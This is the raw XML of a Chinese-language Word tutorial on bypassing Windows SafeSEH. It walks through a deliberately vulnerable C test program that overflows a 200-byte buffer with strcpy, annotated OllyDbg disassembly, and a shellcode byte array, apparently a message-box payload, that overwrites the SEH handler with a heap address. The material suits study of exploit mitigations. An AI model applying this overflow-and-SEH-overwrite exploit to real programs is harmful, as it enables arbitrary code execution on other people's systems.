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&lt;stdafx.h&gt;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&lt;stdlib.h&gt;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&lt;string.h&gt;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shellcode[]=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test(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input)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str[200];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strcpy(str,input);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zero=0;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zero=1/zero;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buf=(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*)malloc(500);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__asm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strcpy(buf,shellcode);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test(shellcode);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代码解释：先申请500字节的空间，然后中断，这是为了方便找到堆的起始位置，然后将shellcode存放到堆中，接下来执行test函数导致缓冲区溢出，紧接着一个除0异常触发异常处理，因为异常处理函数已经被覆盖成堆里shellcode的起始地址，所以直接绕过SafeSEH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590278" w:rsidRDefault="0059027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编译器是VS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2005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,，生成Release版本，</w:t>
      </w:r>
      <w:r w:rsidR="0046328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记得禁用优化，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运行起来载入OD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CDE" w:rsidRDefault="00D67CDE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代码窗可以看到申请堆空间的两条指令，右上角的EAX处存的是申请的堆空间的起始地址，左下角数据区跟随一下就可以看到了，虽然现在还有值，但是没关系的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590278" w:rsidRDefault="0046328E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6F" w:rsidRDefault="005C486F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486F" w:rsidRDefault="005C486F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486F" w:rsidRDefault="005C486F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67CDE" w:rsidRDefault="00D67CDE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接下来几行代码就是将shellcode存放到堆空间了</w:t>
      </w:r>
      <w:r w:rsidR="005C486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，来读读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汇编吧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00401796   .  68 18304000   push    offset shellcode                 ; /src = ""90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,"",90,""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0040179B   .  8B45 FC       mov     eax, dword ptr [ebp-4]           ; |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0040179E   .  50            push    eax                              ; |dest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0040179F   .  E8 6CF8FFFF   call    strcpy                           ; \strcpy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004017A4   .  83C4 08       add     esp, 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</w:p>
    <w:p w:rsidR="00D67CDE" w:rsidRDefault="00D67CDE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300D0" w:rsidRDefault="008300D0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有事没事读读汇编也是不错的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008300D0" w:rsidRDefault="008300D0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然后我们走完这段</w:t>
      </w:r>
      <w:r w:rsidR="007C30B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，到这两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句，也就是执行test函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C486F" w:rsidRDefault="005C486F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004017A7   .  68 18304000   push    offset shellcode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004017AC   .  E8 7FFFFFFF   call    test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046328E" w:rsidRDefault="0046328E" w:rsidP="008300D0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77B59" w:rsidRDefault="008300D0" w:rsidP="004632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跟过去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977B59" w:rsidRDefault="00977B59" w:rsidP="004632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5486400" cy="2677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D0" w:rsidRPr="0046328E" w:rsidRDefault="008300D0" w:rsidP="004632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同样我们来读读汇编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00401730 &gt; $  55            push    ebp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00401731   .  8BEC          mov     ebp, esp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00401733   .  81EC D0000000 sub     esp, 0D0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;抬高栈顶</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046328E" w:rsidRPr="0046328E" w:rsidRDefault="0046328E" w:rsidP="0046328E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00401739   .  A1 00304000   mov     eax, dword ptr [__security_cookie]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取出.data段Cookie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0040173E   .  33C5          xor     eax, ebp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生成Security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Cookie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00401740   .  8945 F8       mov     dword ptr [ebp-8], eax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将Security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Cookie存入栈中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00401743   .  8B45 08       mov     eax, dword ptr [ebp+8]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这是调用test时压栈的shellcode指针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00401746   .  50            push    eax                                  ; /src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00401747   .  8D8D 30FFFFFF lea     ecx, dword ptr [ebp-D0]              ; |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0040174D   .  51            push    ecx                                  ; |dest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0040174E   .  E8 BDF8FFFF   call    strcpy                               ; \strcpy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00401753   .  83C4 08       add     esp, 8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00401756   .  C745 FC 00000&gt;mov     dword ptr [ebp-4], 0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;存个0，为下面除0做准备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0040175D   .  B8 01000000   mov     eax, 1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00401762   .  99            cdq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0046328E" w:rsidRPr="0046328E" w:rsidRDefault="0046328E" w:rsidP="0046328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6328E">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>00401763   .  F77D FC       idiv    dword ptr [ebp-4]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除0操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CDE" w:rsidRDefault="00D67CDE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在单步走下去的时候可以看到缓冲区起始位置，直接观察栈布局或者看参数都可以看出来的，栈中标记出来的就是缓冲区起始地址，同样代码窗口同样可以看到dest目标地址</w:t>
      </w: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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="3116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执行完strcpy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977B59" w:rsidRDefault="00977B59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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="548640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59" w:rsidRDefault="00F4103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既然各种起始地址找的差不多了，可以来看看S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H链了，可以看到只有两个，最上面的是0x0012FFB0，这个是nextSEH的指针，真正执行的是0x0012FFB4处的异常处理函数指针</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41038" w:rsidRDefault="00F41038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5486400" cy="28530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B2" w:rsidRDefault="007C30B2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看到这里接下来的事就好办了，我们的shellcode弄长点，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\x90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填充到0x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0012FFB0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位置，后面跟上申请的堆空间起始地址，也就是shellcode的起始地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C30B2" w:rsidRDefault="007C30B2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长度计算可以用各种工具包里自带的，吾爱虚拟机和shark恒的虚拟机都很好用，推荐一下，里面工具包都很全，我现在用的是shark恒的虚拟机，用的吾爱的工具包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C30B2" w:rsidRDefault="007C30B2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修改后的代码如下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"stdlib.h"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"string.h"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shellcode[]=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"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"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"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"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"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"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"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"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"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"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"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"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"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"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"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"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"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"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"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"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"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"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"\xA0\x29\x3B\x00"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//address of shellcode in heap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test(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input)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str[200];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__asm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strcpy(str,input);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zero=0;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zero=1/zero;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buf=(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*)malloc(500);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strcpy(buf,shellcode);</w:t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test(shellcode);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7C30B2" w:rsidRDefault="007C30B2" w:rsidP="007C30B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C30B2" w:rsidRDefault="00C05657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同样中断后OD附加调试，走完strcpy可以看到S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H已经被覆盖掉了，不用管nextSEH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C05657" w:rsidRDefault="00C05657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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="25292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7" w:rsidRDefault="00C05657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那么接下来的情况就比较清楚了，我们构造的除0异常会触发异常，程序调用异常处理，因为异常处理函数的指针指向的是堆空间，而SafeSEH对指向堆空间的异常处理函数指针是直接校验通过的，所以直接就执行shellcode了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C05657" w:rsidRDefault="00BA0031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接下来我们去掉断点看看效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA0031" w:rsidRPr="00C05657" w:rsidRDefault="00BA0031" w:rsidP="0059027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bookmarkStart w:id="0" w:name="_GoBack"/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5486400" cy="3846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0031" w:rsidRPr="00C05657" w:rsidSect="00BC2D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A8"/>
    <w:rsid w:val="004615A8"/>
    <w:rsid w:val="0046328E"/>
    <w:rsid w:val="00474139"/>
    <w:rsid w:val="00590278"/>
    <w:rsid w:val="005C486F"/>
    <w:rsid w:val="007C30B2"/>
    <w:rsid w:val="008300D0"/>
    <w:rsid w:val="008D0B3B"/>
    <w:rsid w:val="00977B59"/>
    <w:rsid w:val="00BA0031"/>
    <w:rsid w:val="00C05657"/>
    <w:rsid w:val="00D67CDE"/>
    <w:rsid w:val="00D77A0B"/>
    <w:rsid w:val="00F4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DB8B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5556FC7E-E68C-42F6-BE50-AFC7E75F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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-05T11:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-06T02:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>